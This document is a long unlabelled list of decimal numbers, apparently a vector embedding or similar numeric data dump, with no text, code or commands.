-0.03389478102326393, 0.018264247104525566, -0.014957789331674576, 0.0517868734896183, -0.026752255856990814, 0.008123009465634823, -0.03901907429099083, -0.0283840149641037, -0.03252066671848297, -0.02980106882750988, 0.0059902723878622055, 0.021570706740021706, -0.017333859577775, 0.0008199051371775568, -0.018665030598640442, 0.032835569232702255, 0.009196535684168339, 0.01793503388762474, -0.05802763253450394, -0.020024830475449562, 0.03317909687757492, -0.011329272761940956, -0.011436625383794308, -0.013605146668851376, 0.00264981877990067, 0.006333800498396158, -0.026079513132572174, -0.011937604285776615, -0.006133409217000008, -0.028799111023545265, 0.012817895039916039, -0.03286419436335564, 0.0687628909945488, 0.018149739131331444, 0.016718370839953423, 0.03297870606184006, -0.028140682727098465, 0.0019752869848161936, 0.002537098713219166, -0.025965005159378052, 0.0009031033841893077, -0.022200508043169975, -0.0074144829995930195, -0.025950690731406212, 0.002678446238860488, 0.026036573573946953, -0.012374171055853367, 0.020382670685648918, -0.02636578679084778, -0.0006714007467962801, -0.011959074065089226, -0.006172772031277418, -0.045345719903707504, -0.025363830849528313, 0.007979873567819595, 0.03426693379878998, -0.033350858837366104, -0.03243478387594223, -0.018049541860818863, -0.03252066671848297, -0.015501708723604679, -0.0034102327190339565, 0.010219963267445564, 0.0019609732553362846, 0.03197674825787544, -0.022787367925047874, -0.00010293544619344175, -0.03644261509180069, 0.0059187039732933044, -0.0015673473244532943, 0.006927818059921265, 0.005675371736288071, 0.0051958635449409485, -0.021985802799463272, -0.037358690053224564, -0.028985189273953438, -0.007242719177156687, -0.013376127928495407, 0.024905793368816376, -0.007571933325380087, 0.008394969627261162, 0.021327374503016472, -0.021413255482912064, 0.01155113521963358, -0.0021846245508641005, 0.06309467554092407, 0.025678731501102448, -0.0317477285861969, -0.022315017879009247, -0.06137703359127045, 0.04185318201780319, -0.001380374887958169, -0.016303274780511856, 0.018078170716762543, -0.02242952771484852, -0.01224534772336483, 0.016246018931269646, 0.0061441445723176, 0.04817982763051987, -0.022100312635302544, 0.01089986227452755, -0.016260333359241486, -0.02456226386129856, -0.002256192732602358, 0.014499751850962639, -0.011264861561357975, -0.009339672513306141, 0.011178979650139809, 0.029944205656647682, 0.001492200535722077, 0.012266818434000015, -0.0024064863100647926, 0.007700756657868624, -0.006748897023499012, -0.006362427957355976, -0.006230026483535767, -0.02042561210691929, 0.0074144829995930195, -0.006655858363956213, 0.053876668214797974, -0.015129553154110909, 0.0050276778638362885, 0.0027679067570716143, 0.046118658035993576, -0.0022848201915621758, -0.009074869565665722, 0.007178307510912418, 0.033408116549253464, 0.001926978351548314, -0.011737212538719177, 0.012002015486359596, -0.00044461849029175937, 0.004483758471906185, -0.007296395488083363, -0.014621417969465256, 0.01557327713817358, -0.03449595347046852, -0.0342383086681366, 0.006702377926558256, -0.040049660950899124, -0.019022872671484947, -0.010126924142241478, -0.008280460722744465, -0.013283089734613895, -0.004748561419546604, -0.009575847536325455, -0.0006342746783047915, -0.012381328269839287, 0.02971518784761429, -0.0032241549342870712, -0.04108024388551712, -0.028255192562937737, -0.005088510923087597, -0.007729384116828442, -0.0036607221700251102, 0.030946163460612297, 0.015215435065329075, 0.019437968730926514, -0.014399555511772633, -0.0014116860693320632, -0.022085998207330704, 0.016088569536805153, 0.04108024388551712, 0.009046241641044617, 0.010363100096583366, 0.006512721534818411, -0.008223205804824829, 0.010813980363309383, 0.02054012194275856, 0.020024830475449562, -0.07792364060878754, 0.00597238028421998, 0.009711828082799911, 0.019638361409306526, 0.00660933880135417, -0.007693599909543991, -0.02178541198372841, 0.025478338822722435, -0.0007411799160763621, 0.013111324980854988, -0.025392457842826843, 0.010778196156024933, -0.052760202437639236, 0.003929103258997202, -0.017534250393509865, -0.016131510958075523, 0.012374171055853367, 0.010663687251508236, 0.036728888750076294, -0.03695790469646454, -0.008158793672919273, -0.038102999329566956, 0.028341073542833328, -0.02059737592935562, -0.02051149494946003, -0.019581105560064316, 0.003390551544725895, 0.03246341273188591, -0.01729091815650463, -0.006773946341127157, -0.012524465098977089, -0.005754096899181604, 0.01928051933646202, -0.02980106882750988, -0.003000503871589899, 0.0009187589166685939, -0.08605381101369858, -0.0032295226119458675, 0.0035623155999928713, -0.013705343008041382, 0.023445798084139824, -0.028727542608976364, 0.016861507669091225, -0.04288376867771149, -0.013147109188139439, -0.010706627741456032, 0.005947331432253122, -0.018650716170668602, 0.019509537145495415, -0.0007009227410890162, 0.04640493169426918, 0.0034979041665792465, -0.020869337022304535, -0.02784009650349617, -0.0021023207809776068, -0.02058306336402893, 0.012481523677706718, 0.005346157122403383, 0.0007832263363525271, 0.04820845276117325, -0.00778663856908679, 0.010434668511152267, 0.03458183631300926, 0.016976017504930496, -0.002982611767947674, -0.00989790540188551, -0.0024762656539678574, -0.020210906863212585, 0.043742585927248, -0.036700259894132614, 0.020268162712454796, 0.03649986907839775, -0.013676715083420277, 0.03973475843667984, 0.01656092144548893, -0.01653229258954525, 0.006126252468675375, -0.015644844621419907, -0.0039004760328680277, 0.016117196530103683, -0.04852335527539253, -0.0005000839591957629, -0.011057313531637192, 0.014857593923807144, 0.005782724358141422, 0.014027399942278862, -0.030803026631474495, 0.011930447071790695, -0.04431513324379921, 0.004898854997009039, 0.023359915241599083, -0.04442964494228363, 0.03798849135637283, 0.024633832275867462, -0.03048812597990036, 0.0529605932533741, -0.03996377810835838, -0.013726812787353992, -0.03587006777524948, 0.045345719903707504, -0.007979873567819595, -0.059201356023550034, -0.010141237638890743, 0.015043671242892742, -0.01660386100411415, -0.025564221665263176, 0.01920895092189312, -0.02240089885890484, 0.03921946510672569, -0.0036589328665286303, -0.017691701650619507, 0.013912891037762165, 0.006126252468675375, 0.030888907611370087, 0.006902769207954407, 0.01554465014487505, 0.035497911274433136, 0.027339117601513863, 0.01922326348721981, -0.02583618089556694, -0.03887593746185303, -0.03638535737991333, 0.020826395601034164, 0.034066542983055115, -0.0007545989938080311, 0.013748283497989178, -0.05213040113449097, 0.016102883964776993, 0.0076792859472334385, 0.008881635032594204, -0.006222869735211134, 0.01127917505800724, 0.041423771530389786, 0.007421639747917652, -0.030316362157464027, 0.038818683475255966, 0.04975432902574539, 0.011164665222167969, 0.03449595347046852, -0.02723892219364643, -0.010792509652674198, 0.00577198900282383, 0.002606877824291587, -0.03183361142873764, -0.030144596472382545, -0.036070458590984344, -0.0005497345118783414, 0.00858820416033268, -0.042082201689481735, 0.027439313009381294, -0.01584523729979992, 0.03495399281382561, 0.034095171838998795, -0.045374345034360886, -0.03641398623585701, -0.0355551652610302, 0.03581281378865242, -0.00021246859978418797, -0.0035354774445295334, 0.01292524766176939, 0.015415826812386513, -0.020325416699051857, -0.013168579898774624, 0.03524026647210121, 0.0012506572529673576, 0.008087226189672947, 0.027596762403845787, 0.009990944527089596, -0.039305347949266434, 0.011121724732220173, -0.013504951260983944, -0.012173779308795929, 0.01912306807935238, 0.006419682875275612, -0.019352087751030922, -0.016718370839953423, 0.014406712725758553, -0.026279905810952187, -0.002009281888604164, 0.019581105560064316, 0.026623433455824852, 0.011973388493061066, -0.00025473866844549775, 0.020897964015603065, -0.028613034635782242, -0.009525749832391739, -0.012975345365703106, -0.037330061197280884, 0.007500364910811186, 0.0022794525139033794, 0.012481523677706718, 0.022987760603427887, -0.0048344433307647705, 0.013025443069636822, 0.011114567518234253, -0.013175737112760544, -0.01930914632976055, 0.02262991853058338, 0.003267096122726798, 0.023545993492007256, -0.0002177244023187086, -0.02572167105972767, -0.0017274814890697598, -0.009432710707187653, 0.01647503860294819, 0.022200508043169975, 0.04119475185871124, 0.024791283532977104, -0.008029971271753311, -0.01494347583502531, 0.030774399638175964, -0.005213755648583174, 0.004319150932133198, -0.04626179486513138, -0.02184266597032547, 0.016875822097063065, 0.007944089360535145, -0.010019571520388126, -0.01720503531396389, -0.019337773323059082, -0.016947390511631966, -0.05158647894859314, 0.018164051696658134, -0.03753045201301575, 0.001215767697431147, -0.0042082201689481735, 0.01923757791519165, 0.008072911761701107, -0.02841264195740223, -0.01524406298995018, -0.006763210985809565, 0.05682528391480446, 0.024977361783385277, 0.047406889498233795, 0.006509143393486738, -0.006870563607662916, 0.008058598265051842, -0.018650716170668602, -0.009948003105819225, -0.022128939628601074, -0.02049718052148819, 0.03114655427634716, -0.008652616292238235, -0.005067040678113699, 0.010291531682014465, 0.018679345026612282, 0.004959688056260347, -0.0019144539255648851, -0.02453363686800003, 0.043427687138319016, -0.03753045201301575, 0.004261896479874849, -0.016303274780511856, 0.04878100007772446, -0.001661280752159655, 0.020067770034074783, -0.021327374503016472, -0.021756784990429878, 0.01846463978290558, -0.038790054619312286, -0.002803690964356065, 0.009311044588685036, 0.008731340989470482, 0.016303274780511856, -0.012481523677706718, 0.035354774445295334, 0.022357959300279617, 0.016317587345838547, 0.018393071368336678, 0.00728208152577281, 0.0020200172439217567, -0.0317477285861969, 0.0015047249617055058, 0.007428796961903572, 0.006541348993778229, 0.013411912135779858, -0.016160137951374054, 0.0005376573535613716, 0.01222387794405222, -0.014492594636976719, 0.020339731127023697, -0.0037573394365608692, -0.0031042781192809343, 0.01192329078912735, 0.003252782393246889, -0.004594689235091209, -0.02529226243495941, -0.01796366088092327, 0.00029410127899609506, -0.043427687138319016, -0.012689071707427502, 0.01057064812630415, 0.018765226006507874, -0.006934974808245897, 0.01730523258447647, 0.009847807697951794, -0.0040364558808505535, -0.03303596004843712, -0.0068848771043121815, -0.001991389784961939, 0.011708585545420647, -0.020411299541592598, 0.004061504732817411, -0.010119767859578133, 0.02125580608844757, 0.01782052405178547, -0.021413255482912064, -0.029371658340096474, -0.02314520999789238, 0.02722460776567459, -0.016861507669091225, -0.020826395601034164, -0.004680571146309376, 0.02380364015698433, -0.0010395306162536144, -0.011959074065089226, -0.02510618418455124, 0.02649461105465889, -0.020368358120322227, 0.024762656539678574, 0.048580609261989594, -0.01557327713817358, 0.009189378470182419, 0.01658954843878746, 0.015315631404519081, 0.012367013841867447, 0.002887783804908395, 0.02912832610309124, 0.05101393535733223, -0.02721029333770275, 0.0205544363707304, -0.02719598077237606, 0.0106064323335886, 0.03621359542012215, -0.00031221701647154987, -0.01154397800564766, -0.009175064973533154, -0.01919463649392128, -0.0318908654153347, 0.0125459348782897, -0.016274647787213326, -0.021441884338855743, -0.0053640492260456085, 0.01022711955010891, 0.013440540060400963, -0.00992653239518404, -0.005954488180577755, 0.0122167207300663, -0.009239476174116135, 0.005127873737365007, -0.03704378753900528, 0.01794934645295143, -0.009525749832391739, 0.01524406298995018, 0.02042561210691929, 0.005539391655474901, -0.006866985000669956, 0.0125459348782897, -0.0317477285861969, -0.042712002992630005, 0.017720328643918037, 0.009683200158178806, 0.026279905810952187, -0.021356001496315002, 0.03054537996649742, 0.038732800632715225, 0.017706014215946198, -0.007421639747917652, -0.011651330627501011, -0.026909707114100456, -0.012073583900928497, -0.03692927956581116, 0.0007228405447676778, -0.0035497911740094423, -0.01155113521963358, -0.013054070994257927, -0.015100926160812378, 0.001966340932995081, -0.00008895724749891087, -0.01913738250732422, 0.007901147939264774, -0.006122673861682415, 0.0075146788731217384, -0.018765226006507874, -0.00889594852924347, 0.02118423767387867, -0.013805538415908813, 0.00206295819953084, 0.004057926591485739, 0.0018661451758816838, 0.012524465098977089, 0.02901381626725197, 0.01657523401081562, -0.0033118263818323612, -0.00298797944560647, -0.01909444108605385, -0.03389478102326393, -0.036099083721637726, 0.018679345026612282, 0.013941518031060696, 0.02045423910021782, 0.04288376867771149, 0.004612581338733435, -0.02314520999789238, 0.048065315932035446, -0.0021184238139539957, -0.026351474225521088, -0.01595974713563919, -0.027410686016082764, -0.0036481977440416813, -0.0049990504048764706, -0.016346216201782227, -0.0036750356666743755, 0.02716735377907753, -0.000017864136680145748, -0.01729091815650463, -0.0012220299104228616, -0.017462681978940964, -0.011894662864506245, 0.0028645240236073732, -0.03638535737991333, 0.008573890663683414, 0.008981830440461636, -0.004061504732817411, 0.001491305883973837, -0.0019591841846704483, -0.017577191814780235, -0.003376237815245986, -0.01647503860294819, -0.02317383885383606, -0.01584523729979992, -0.006072576157748699, 0.00762203149497509, -0.0006776630179956555, 0.034152425825595856, -0.0067131128162145615, 0.005077776033431292, 0.014478281140327454, -0.023660503327846527, -0.02968655899167061, 0.06109075993299484, 0.004594689235091209, -0.0007174729253165424, -0.02185698039829731, -0.005188706796616316, -0.008581047877669334, 0.007085268385708332, 0.01862208917737007, 0.0025048928800970316, -0.007593404036015272, 0.006709534674882889, -0.014650044962763786, -0.005210177507251501, -0.02181403897702694, -0.006834779400378466, -0.005517921410501003, -0.0122167207300663, 0.006992229726165533, 0.019037187099456787, 0.010806824080646038, 0.017562877386808395, -0.026007944718003273, -0.018722284585237503, -0.031461454927921295, 0.02197149023413658, -0.006569976452738047, -0.005403412040323019, -0.01988169364631176, 0.013354658149182796, -0.009919376112520695, -0.010119767859578133, 0.007196199614554644, -0.0031919493339955807, 0.012653287500143051, -0.007253454066812992, -0.009797709994018078, 0.01845032535493374, -0.02065463177859783, 0.003193738404661417, 0.006068997550755739, -0.015000729821622372, -0.010177021846175194, 0.035984575748443604, 0.0008610569639131427, 0.005879341624677181, 0.014592790976166725, 0.0019556055776774883, 0.0024547951761633158, -0.0463763028383255, 0.003113224171102047, -0.032119885087013245, 0.01527268998324871, 0.019437968730926514, -0.030173225328326225, 0.013125639408826828, -0.0008382445084862411, 0.01925189048051834, 0.0027786418795585632, -0.017591504380106926, -0.008144480176270008, 0.03171909973025322, -0.029657931998372078, -0.01796366088092327, -0.02181403897702694, -0.0007635450456291437, 0.030860280618071556, -0.013454853557050228, -0.0312324371188879, 0.026752255856990814, -0.0029647196643054485, -0.010842608287930489, -0.028713230043649673, -0.014056027866899967, 0.003544423496350646, -0.013605146668851376, 0.012460052967071533, -0.02112698182463646, 0.0013347500935196877, -0.012381328269839287, -0.004512385465204716, 0.02991557866334915, -0.018264247104525566, 0.012853679247200489, 0.004222533665597439, 0.016088569536805153, -0.03103204444050789, -0.016303274780511856, 0.020354043692350388, -0.019352087751030922, 0.012424268759787083, 0.022916192188858986, -0.059945665299892426, 0.005872184876352549, -0.020940905436873436, -0.011021529324352741, 0.011257704347372055, 0.025707358494400978, 0.009024770930409431, -0.00450165057554841, 0.02197149023413658, -0.013340343721210957, 0.022014429792761803, -0.004659100901335478, 0.009504279121756554, -0.023517366498708725, 0.000612804142292589, -0.03781672567129135, 0.03051675297319889, -0.019681300967931747, -0.022687172517180443, -0.018221307545900345, -0.021499138325452805, -0.009418397210538387, -0.023331288248300552, 0.02250109612941742, -0.01325446180999279, -0.011966231279075146, 0.01651798002421856, 0.002497736131772399, 0.020668944343924522, 0.010728098452091217, 0.02111266925930977, -0.019724242389202118, 0.014070341363549232, -0.008702713996171951, 0.014728770591318607, 0.012774953618645668, -0.003936260472983122, 0.044744543731212616, 0.021985802799463272, -0.010692314244806767, -0.011300645768642426, 0.0013776911655440927, 0.002710652071982622, -0.0020665365736931562, -0.019996201619505882, 0.0020182279404252768, -0.0050956676714122295, -0.026308532804250717, -0.025020301342010498, 0.010255747474730015, 0.014592790976166725, -0.019380714744329453, -0.004487336613237858, 0.005339000374078751, -0.042082201689481735, -0.011765839532017708, 0.01460710447281599, 0.003879005555063486, 0.020697573199868202, -0.014370928518474102, 0.012867992743849754, -0.004340621642768383, -0.045374345034360886, 0.005743361543864012, -0.035698302090168, -0.009862121194601059, 0.013340343721210957, 0.011708585545420647, 0.009382613003253937, -0.05542254447937012, 0.003628516336902976, 0.040708087384700775, 0.04706335812807083, 0.026623433455824852, -0.026322845369577408, -0.010327315889298916, 0.011057313531637192, -0.00429410208016634, -0.015458768233656883, 0.020969532430171967, -0.022100312635302544, -0.003002293175086379, -0.025378143414855003, 0.04428650811314583, -0.0011665644124150276, -0.024089913815259933, 0.01123623363673687, 0.01913738250732422, 0.005668214987963438, -0.022887565195560455, -0.04898139089345932, -0.02189992181956768, -0.010026728734374046, -0.01986737921833992, 0.02721029333770275, 0.00248163309879601, 0.06269389390945435, -0.0019484488293528557, 0.024347558617591858, -0.005929439328610897, 0.024018345400691032, -0.0008525581797584891, -0.02324540726840496, -0.04188181087374687, 0.016933076083660126, -0.01460710447281599, 0.02185698039829731, 0.009575847536325455, -0.012109368108212948, -0.002748225349932909, -0.0004522226226981729, 0.011851722374558449, -0.013383285142481327, -0.018063856288790703, -0.0030506018083542585, -0.0024905791506171227, -0.03435281664133072, 0.007493208162486553, 0.023345602676272392, 0.030688516795635223, 0.004673414397984743, -0.007908305153250694, 0.01090701948851347, 0.00496684480458498, -0.005113559775054455, -0.0048380219377577305, -0.025592848658561707, -0.010377413593232632, -0.017634445801377296, -0.000017388876585755497, -0.047349631786346436, -0.018822481855750084, 0.011601232923567295, -0.02262991853058338, -0.01928051933646202, 0.0020665365736931562, 0.022214822471141815, -0.004186749458312988, 0.012789268046617508, -0.005850714165717363, -0.01713346689939499, 0.010448982007801533, 0.012803581543266773, -0.01918032206594944, 0.0032849882263690233, -0.0051994421519339085, -0.013619461096823215, 0.02324540726840496, -0.004351356998085976, 0.03692927956581116, 0.034868109971284866, 0.00923231989145279, 0.042683374136686325, -0.014048870652914047, -0.024662459269165993, -0.018650716170668602, -0.0010547388810664415, 0.016331901773810387, -0.0035229530185461044, 0.03798849135637283, -0.02642304264008999, -0.02177109755575657, -0.017090527340769768, -0.01561621855944395, 0.02058306336402893, -0.018707972019910812, 0.005117138382047415, -0.012188093736767769, 0.012839365750551224, -0.004247582517564297, -0.03134694695472717, 0.03973475843667984, 0.0205544363707304, 0.014456810429692268, -0.03395203500986099, -0.010685157962143421, -0.02517775259912014, -0.05024099349975586, -0.040708087384700775, 0.02510618418455124, -0.008638301864266396, -0.012087897397577763, 0.003714398480951786, 0.0011817726772278547, 0.010348786599934101, 0.005517921410501003, 0.016346216201782227, -0.015687786042690277, -0.002873470075428486, 0.004422925412654877, -0.015630532056093216, -0.01123623363673687, -0.04829433560371399, -0.03449595347046852, 0.03295007720589638, 0.01982443779706955, 0.018951304256916046, -0.018808167427778244, 0.038131628185510635, -0.026966961100697517, 0.024905793368816376, 0.0005559967830777168, 0.02773989923298359, -0.0042296904139220715, -0.0018876157701015472, 0.012367013841867447, 0.013640930876135826, 0.0250918697565794, -0.021585019305348396, 0.004347778391093016, 0.01996757462620735, 0.011744369752705097, -0.0142277916893363, 0.013655245304107666, -0.029600678011775017, 0.006215712986886501, 0.001577187911607325, 0.02982969582080841, 0.0013007550733163953, -0.032749686390161514, -0.02709578536450863, 0.006036791950464249, 0.013347500935196877, 0.005786302499473095, -0.0033726594410836697, -0.011844565160572529, -0.0009464916656725109, 0.002998714568093419, 0.0008704502834007144, 0.05407705903053284, 0.0021309482399374247, -0.0024726870469748974, -0.0045732189901173115, -0.018994245678186417, -0.014385242015123367, 0.008845850825309753, -0.013920048251748085, -0.0219428613781929, -0.02781146764755249, 0.000411741784773767, -0.032892823219299316, -0.01797797530889511, -0.02241521328687668, -0.005750518292188644, 0.02184266597032547, -0.018378756940364838, 0.010441824793815613, 0.007765167858451605, 0.02842695638537407, -0.011336429975926876, -0.004387141205370426, 0.009783396497368813, -0.012231034226715565, 0.017634445801377296, -0.008452224545180798, -0.016174452379345894, -0.006380320060998201, 0.0015852394280955195, -0.023660503327846527, 0.00001737489947117865, 0.03309321403503418, -0.03838927298784256, -0.00989074818789959, -0.03252066671848297, -0.0005559967830777168, 0.014886220917105675, 0.0019466596422716975, -0.02791166491806507, -0.008201735094189644, 0.01847895234823227, -0.01359799038618803, -0.04045044258236885, -0.017004644498229027, 0.00560738192871213, 0.061262525618076324, 0.023045014590024948, -0.03232027590274811, -0.007203356362879276, 0.0027017060201615095, 0.008838693611323833, 0.028985189273953438, 0.0031794249080121517, 0.0006991334958001971, 0.0312324371188879, 0.031547337770462036, 0.006555662490427494, -0.0021971489768475294, -0.0013580097584053874, 0.0036625112406909466, 0.0027321225497871637, -0.022014429792761803, -0.02974381484091282, 0.01654660701751709, -0.0018518315628170967, 0.010413197800517082, 0.009103496558964252, 0.014342301525175571, -0.03601320460438728, 0.014113282784819603, -0.015186808072030544, -0.0044730231165885925, -0.03904770314693451, -0.002361756283789873, 0.009389770217239857, -0.02197149023413658, -0.002343864180147648, -0.003946995362639427, 0.008015657775104046, 0.011823094449937344, -0.007829579524695873, 0.020296789705753326, -0.019380714744329453, 0.00028403697069734335, -0.025965005159378052, -0.008201735094189644, -0.008373498916625977, -0.02982969582080841, -0.012488680891692638, -0.018035229295492172, -0.020354043692350388, 0.03704378753900528, -0.004923903848975897, -0.015430140309035778, 0.0004334359255153686, -0.006820465438067913, -0.02573598548769951, 0.028655974194407463, 0.018264247104525566, -0.021613648161292076, -0.006705956067889929, -0.009611631743609905, 0.0009965895442292094, 0.0031346946489065886, -0.011057313531637192, -0.016847193241119385, -0.005843557417392731, -0.008416440337896347, 0.017849151045084, -0.0032975126523524523, -0.03252066671848297, -0.017634445801377296, 0.00728566013276577, 0.01158691942691803, 0.019538164138793945, 0.011128881014883518, 0.01419200748205185, -0.016360528767108917, -0.011372214183211327, 0.0008695556898601353, 0.030030088499188423, -0.011930447071790695, 0.01583092287182808, -0.003864692058414221, -0.0034263357520103455, -0.013075540773570538, 0.012259661220014095, 0.011050156317651272, 0.026308532804250717, -0.01657523401081562, 0.017677387222647667, -0.014621417969465256, 0.005213755648583174, -0.0070530627854168415, 0.0027464362792670727, 0.0015422983560711145, 0.008602517656981945, 0.020196594297885895, 0.0037322903517633677, 0.011486723087728024, 0.006827622652053833, 0.01097143068909645, -0.009919376112520695, -0.00025831707171164453, -0.01598837412893772, 0.00855957716703415, -0.019395027309656143, 0.02383226715028286, 0.027396371588110924, -0.013834165409207344, 0.011772996746003628, -0.003225944237783551, 0.015072298236191273, 0.018650716170668602, -0.02112698182463646, -0.04723512381315231, -0.030344989150762558, 0.0026158238761126995, -0.012631816789507866, -0.019423656165599823, 0.0011594075476750731, 0.005181550048291683, 0.022043058648705482, 0.0031579541973769665, -0.028126368299126625, -0.02576461248099804, -0.0014698354061692953, 0.01597405970096588, -0.002177467569708824, 0.004186749458312988, 0.013125639408826828, 0.0012023486196994781, 0.003599888877943158, 0.03435281664133072, 0.04087985306978226, 0.0252350065857172, 0.004626895301043987, -0.00029946889844723046, -0.010728098452091217, 0.028097741305828094, -0.026337159797549248, 0.012316916137933731, -0.0050276778638362885, 0.006373163312673569, 0.0014868328580632806, -0.017634445801377296, 0.02855577878654003, 0.020983844995498657, 0.02988695167005062, -0.010420355014503002, 0.006659436970949173, 0.016145823523402214, 0.00627654604613781, -0.0002050881157629192, 0.011050156317651272, 0.0038968976587057114, -0.0060904682613909245, 0.016976017504930496, 0.03621359542012215, -0.014857593923807144, 0.02656617946922779, 0.019437968730926514, -0.01591680571436882, 0.001548560569062829, -0.003234890289604664, 0.007335757836699486, 0.03323635086417198, 0.010177021846175194, -0.022687172517180443, 0.012631816789507866, 0.026866765692830086, -0.0037072414997965097, -0.02653755061328411, -0.018894050270318985, -0.00298797944560647, 0.016847193241119385, 0.00963310245424509, 0.000907129084225744, 0.024748342111706734, 0.01581661030650139, 0.014814652502536774, -0.010448982007801533, 0.004358513746410608, 0.02507755719125271, -0.01663248986005783, -0.0067166914232075214, 0.021685216575860977, 0.02572167105972767, 0.019609732553362846, 0.032721057534217834, -0.015143866650760174, 0.024175794795155525, 0.030631262809038162, -0.022200508043169975, 0.012030642479658127, 0.009955160319805145, 0.03970612958073616, -0.03163322061300278, -0.01524406298995018, -0.021542079746723175, -0.020296789705753326, -0.008810066618025303, -0.007664972450584173, -0.016374843195080757, 0.009919376112520695, -0.006605760660022497, -0.00039295508759096265, 0.002469108672812581, 0.021041100844740868, -0.008681243285536766, -0.045946892350912094, -0.020683258771896362, 0.000005416551175585482, -0.01912306807935238, -0.006641544867306948, -0.013068384490907192, 0.007886834442615509, 0.008230362087488174, -0.008001343347132206, 0.009726141579449177, -0.0012783899437636137, 0.026108141988515854, -0.016990330070257187, 0.004988315515220165, 0.0025460447650402784, -0.02968655899167061, 0.017620133236050606, 0.010742411948740482, 0.0028806268237531185, -0.00033122734748758376, 0.0005452614859677851, 0.02046855352818966, -0.024819910526275635, -0.02122717909514904, -0.004197484813630581, -0.000823483569547534, 0.005088510923087597, 0.009110653772950172, 0.009740455076098442, -0.010885548777878284, -0.00926094688475132, -0.005610960070043802, -0.013784067705273628, 0.0025764612946659327, -0.015329944901168346, 0.0012766007566824555, 0.00900330115109682, -0.01647503860294819, 0.010148394852876663, -0.011837407946586609, -0.00028694444335997105, -0.006154879927635193, 0.015143866650760174, -0.005482137203216553, 0.011307802051305771, -0.01419916469603777, -0.0027589607052505016, -0.005496450699865818, 0.01993894763290882, 0.0035533695481717587, 0.03907632827758789, 0.015100926160812378, 0.003249204019084573, 0.022930504754185677, -0.00889594852924347, 0.001046687364578247, -0.02058306336402893, -0.011508193798363209, 0.00021280407963786274, -0.007081690244376659, 0.03649986907839775, 0.025392457842826843, 0.005417725536972284, -0.003227733541280031, -0.004984736908227205, 0.005478558596223593, 0.03269243240356445, 0.0212844330817461, -0.013111324980854988, -0.008208892308175564, 0.004974001552909613, 0.014828965999186039, -0.022830309346318245, -0.017462681978940964, 0.012975345365703106, -0.02915695309638977, 0.04422925412654877, 0.0028358965646475554, -0.00865977257490158, 0.008187421597540379, -0.00956153403967619, -0.036814767867326736, 0.006187085527926683, -0.016231706365942955, -0.004154543858021498, 0.01024143397808075, 0.01061358954757452, -0.0010395306162536144, -0.026322845369577408, 0.021484823897480965, -0.015029357746243477, -0.017992287874221802, 0.03844652697443962, 0.020969532430171967, -0.01393436174839735, 0.015172494575381279, 0.010678000748157501, 0.025335201993584633, 0.03183361142873764, -0.022000117227435112, 0.014857593923807144, -0.014914847910404205, 0.004193906672298908, 0.025034615769982338, 0.003667878918349743, -0.006269389297813177, -0.0279402919113636, -0.011429468169808388, -0.006179928779602051, 0.016288960352540016, -0.008538106456398964, 0.000766676152125001, -0.004029299132525921, 0.009210849180817604, -0.003614202607423067, 0.012309759855270386, 0.012460052967071533, -0.03443869948387146, -0.037358690053224564, -0.004143808502703905, 0.013032600283622742, 0.011171822436153889, 0.013211521320044994, -0.012273975647985935, -0.032005373388528824, 0.03111792728304863, 0.02242952771484852, 0.035440657287836075, -0.011350743472576141, 0.0006016215775161982, -0.027353430166840553, 0.001186245703138411, 0.013841322623193264, 0.004648365546017885, -0.0011620913865044713, -0.04036455973982811, 0.03166184574365616, -0.023045014590024948, 0.00664870161563158, -0.00020989660697523504, 0.00959016103297472, -0.004104446154087782, 0.006079732906073332, -0.008394969627261162, -0.006251497194170952, -0.01453553605824709, -0.01657523401081562, 0.000809169898275286, 0.03134694695472717, 0.0076792859472334385, 0.023961089551448822, 0.003140062093734741, 0.017047585919499397, 0.026752255856990814, -0.02582186833024025, -0.008080068975687027, 0.007543306332081556, 0.0043048374354839325, 0.0038145941216498613, 0.01853620819747448, 0.015730727463960648, -0.00825183279812336, 0.007736540865153074, -0.018994245678186417, 0.026695001870393753, -0.00560738192871213, -0.007521835621446371, 0.00893173273652792, -0.015043671242892742, -0.006176350172609091, 0.006208556238561869, 0.019008558243513107, -0.010878392495214939, -0.003039866453036666, 0.035354774445295334, -0.004419346805661917, -0.009432710707187653, 0.00006558570021297783, -0.0048380219377577305, -0.05089942365884781, 0.0016639645909890532, -0.006892033852636814, -0.01849326677620411, -0.0027124411426484585, -0.026652060449123383, -0.01978149637579918, 0.009654573164880276, -0.003152586752548814, 0.018965618684887886, 0.009733297862112522, 0.02718166634440422, 0.016976017504930496, -0.0004195695510134101, -0.034868109971284866, 0.004369249101728201, 0.0397920124232769, 0.0013428014935925603, -0.017534250393509865, 0.01492916140705347, 0.0019573948811739683, 0.003753761062398553, -0.0029808226972818375, -0.018221307545900345, 0.03045949712395668, 0.005886498373001814, 0.022801682353019714, -0.016990330070257187, 0.021041100844740868, 0.0007711491780355573, -0.03186223655939102, 0.0070530627854168415, -0.031547337770462036, 0.003778809914365411, 0.011107411235570908, 0.010792509652674198, -0.009411240927875042, 0.017691701650619507, -0.024819910526275635, -0.026151081547141075, 0.01983875222504139, -0.01928051933646202, 0.0031275376677513123, -0.011264861561357975, -0.001046687364578247, 0.005024099722504616, 0.0047342474572360516, 0.031432826071977615, 0.021542079746723175, -0.00025362041196785867, -0.009289574809372425, -0.007686442695558071, -0.008731340989470482, -0.011501036584377289, -0.005034834612160921, -0.006849092897027731, 0.021642275154590607, -0.016246018931269646, 0.009017614647746086, 0.004143808502703905, -0.004866648931056261, -0.018092483282089233, -0.01783483847975731, -0.002930724760517478, -0.019566792994737625, -0.011150351725518703, 0.022014429792761803, 0.015501708723604679, 0.010434668511152267, 0.025449711829423904, 0.003972044680267572, -0.016890134662389755, 0.007063798140734434, -0.009661729447543621, -0.0138985775411129, 0.00024623991339467466, 0.019724242389202118, -0.007357228547334671, 0.02248678170144558, 0.0024046972393989563, 0.013762596994638443, 0.01427073311060667, 0.016188764944672585, -0.004555326886475086, -0.006433996371924877, -0.016317587345838547, 0.020697573199868202, -0.006018899846822023, 0.006498408038169146, -0.017992287874221802, 0.016446411609649658, 0.00014492594345938414, -0.026695001870393753, -0.016017001122236252, 0.013089855201542377, 0.004455131012946367, -0.0007246297318488359, 0.010992901399731636, -0.005245961248874664, -0.006741740275174379, -0.014206320978701115, 0.004709198605269194, 0.008652616292238235, 0.028970876708626747, 0.01262466050684452, 0.014141909778118134, -0.012073583900928497, -0.01363377459347248, -0.023374229669570923, -0.0015521390596404672, 0.01024143397808075, 0.012732013128697872, 0.000949175504501909, 0.021570706740021706, 0.03360850736498833, 0.0021184238139539957, -0.0020182279404252768, -0.012853679247200489, 0.0049310605973005295, -0.037473198026418686, 0.02723892219364643, 